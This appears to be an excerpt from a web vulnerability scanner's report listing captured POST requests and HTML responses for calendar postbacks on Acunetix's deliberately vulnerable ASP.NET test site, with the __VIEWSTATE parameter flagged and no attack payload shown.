Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8366&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMDEUwrQ2ghkZGSXUPK%2F74PbDx4xHQUxUIkGCdqQOg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLquovgDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNNufQws7HFUO9kuiD94k2XlS4At
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:44 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMDEUwrQ2ghkZGSXUPK/74PbDx4xHQUxUIkGCdqQOg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLquovgDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNNufQws7HFUO9kuiD94k2XlS4At" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:White" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1085 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,085 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8325&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAA1YjSr9oIZGRkEAv9fIhvuFxTrM3tSDO2l3mPM0U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKt3YFNAuKJ2soFAv6Q%2FOMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq%2FUCAuadq%2FUCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm%2BYFAuadm%2BYFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C%2B6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2Ar9QUOpNH5GPK3%2FZgaMhJdpFQEHG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:54 GMT Content-Length: 12593
Response Body - size: 12,593 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAA1YjSr9oIZGRkEAv9fIhvuFxTrM3tSDO2l3mPM0U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKt3YFNAuKJ2soFAv6Q/OMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq/UCAuadq/UCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm+YFAuadm+YFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C+6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2Ar9QUOpNH5GPK3/ZgaMhJdpFQEHG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:White" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
